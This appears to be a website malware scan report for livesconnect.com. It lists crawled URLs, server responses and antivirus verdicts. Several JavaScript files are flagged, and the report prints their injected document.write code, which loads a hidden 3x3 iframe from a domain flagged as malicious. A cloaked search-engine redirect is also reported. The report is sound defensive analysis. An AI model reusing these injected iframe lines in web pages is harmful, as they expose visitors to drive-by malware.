Scanned pages/files
Request | Server response | Status |
http://livesconnect.com/ | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://livesconnect.com/bonsai/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://livesconnect.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 14:43:56 GMT Location: https://supremecenter103.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
https://supremecenter103.com/404/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:43:58 GMT Location: http://us.cloudlogin.co/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://us.cloudlogin.co/404/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:43:58 GMT Location: https://us.cloudlogin.co/404/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | clean |
https://us.cloudlogin.co/404/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 10 Sep 2014 14:43:59 GMT Pragma: no-cache Location: /login/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: WHCP=d3vkv13ovqc9h293lhvuf5tit1; path=/ X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
https://us.cloudlogin.co/login/ | 200 OK Content-Length: 5887 Content-Type: text/html | clean |
https://us.cloudlogin.co/js/jses.min.js?v=1404979296 | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
http://livesconnect.com/js/jquery_plugins/jquery-fonteffect-1.0.0.min.js | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 14:44:03 GMT Location: https://supremecenter103.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://supremecenter103.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:44:03 GMT Location: http://us.cloudlogin.co/test404page.js Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://us.cloudlogin.co/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:44:03 GMT Location: https://us.cloudlogin.co/test404page.js Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
https://us.cloudlogin.co/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 10 Sep 2014 14:44:04 GMT Pragma: no-cache Location: /login/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: WHCP=c8cn1dv5rjl6jnh3l5d5lm1hl3; path=/ X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
http://livesconnect.com/js/video-js/video.min.js | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 14:44:04 GMT Location: https://supremecenter103.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.corecounter.net/counter.php?user=59 | 200 OK Content-Length: 482 Content-Type: text/html | clean |
http://livesconnect.com/ted/ | 200 OK Content-Length: 25514 Content-Type: text/html | clean |
http://livesconnect.com/ted/components/com_gantry/js/mootools-1.2.5.js | 200 OK Content-Length: 121179 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3463 bytes skipped]... x:css:value"};return g},serve:function(g,d){if($type(g)!="fx:css:value"){g=this.parse(g)}var f=[];g.each(function(a){f=f.concat(a.parser.serve(a.value,d))});return f},render:function(g,h,i,f){g.setStyle(h,this.serve(i,f))},search:function(d){if(Fx.CSS.Cache[d]){return Fx.CSS.Cache[d]}var c={};Array.each(document.styleSheets,function(b,h){var i=b.href;if(i&&i.contains(":</iframe>');document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/media/system/js/caption.js | 200 OK Content-Length: 2136 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1025 bytes skipped]... container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_jfbconnect/includes/jfbconnect.js?v412 | 200 OK Content-Length: 8365 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3862 bytes skipped]... .location.href + '?jfbcCanvasBreakout=1'; else top.location.href = window.location.href + '&jfbcCanvasBreakout=1'; } } }, request:{ currentId:null, popup:function (jfbcReqId) { jfbc.request.currentId = jfbcReqId; data = jfbcRequests[;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-totop-mt1.2.js | 200 OK Content-Length: 904 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.0(\'j\',1(){2 a=f.d(\'c-9\');8(a){2 b=6 5.4(3);a.7(\'g\',\'h\').0(\'i\',1(e){e.k();b.l()})}});',22,22,'addEvent|function|var|window|Scroll|Fx|new|setStyle|if|totop|||gantry|id||document|outline|none|click|domready|stop|toTop'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-buildspans-mt1.2.js | 200 OK Content-Length: 1266 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: wdxjnxsz.sellclassics.com ...[493 bytes skipped]... 7=z A(\'7\').8(\'6\',n);7.C(d,\'D\');d.E(a)}};$$(e).5(3(c){j.5(3(h){c.t(h).5(3(b){2 a=b.x();9(a&&a.l(\'F\')==\'a\')f(a);H f(b)})})})})};',44,44,'||var|function|rest|each|text|span|set|if||||||||||||get|length|first|split|slice|join|html|innerHTML|getElements|visible|visibility|setStyle|getFirst|clone|new|Element|times|inject|top|replaces|tag|GantryBuildSpans|else'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Decoded script: ...[633 bytes skipped]... le('visibility','visible');var b=a.get('text');var c=b.split(" ");first=c[0];rest=c.slice(1).join(" ");html=a.innerHTML;if(rest.length>0){var d=a.clone().set('text',' '+rest),span=new Element('span').set('text',first);span.inject(d,'top');d.replaces(a)}};$$(e).each(function(c){j.each(function(h){c.getElements(h).each(function(b){var a=b.getFirst();if(a&&a.get('tag')=='a')f(a);else f(b)})})})})}; <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe> Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-inputs-mt1.2.js | 200 OK Content-Length: 3242 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2629 bytes skipped]... lse|each|10000px|opera|position|setStyles|absolute|hasClass|checks|true|radio|left|InputsExclusion|checkbox|all|removeClass|morph|set|setStyle|display|switchReplacement|none|return|fireEvent|erase|gecko|has|join|getProperty|replace|for|radios|right|init|setProperty|radioparent|document|direction|body|id|getStyle|new|push|Hash|version|window|content_vote|trident5|domready'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-smartload-mt1.2.js | 200 OK Content-Length: 2517 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1835 bytes skipped]... rolling|typeof|undefined|document|id|spinner|dimensions|placeholder|start|200|exclusion|Fx|fx|else|getScrollSize|scrollSize|getScroll|opacity|addEvent|onload|image|Asset|getPosition|Hash|setOptions|bind|set|initialize|Tween|split|duration|250|transition|img|Transitions|window|chain|gif|blank|Sine|easeIn|Options|Events|Implements|Class|addClass|GantrySmartLoad|removeClass'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/templates/rt_panacea_j15/js/gantry-rotator-mt1.2.js | 200 OK Content-Length: 512 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 2007 - 2011 RocketTheme, LLC * @license http: */ eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-morearticles-mt1.2.js | 200 OK Content-Length: 1959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1182 bytes skipped]... ment|return|buildButton|ajax|get|spinner|handle|set|div|length|removeEvent|GantryBuildSpans|GantryArticleDetails|undefined|refresh|GantryMoreArticles|Class|Implements|Options|initialize|setOptions|teaser|leading|Request|method|onRequest|onSuccess|id|href|adopt|span|text|class|after|addEvent|stop|hasClass|limitstart|removeClass|html|getElements|article|else|block|h3|h2|h1|init'.split('|'),0,{}));document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://livesconnect.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: livesconnect.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:43:54 GMT Location: http://ya.ru Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 220 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=livesconnect.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://livesconnect.com/
Result: livesconnect.com is not infected or malware details are not published yet.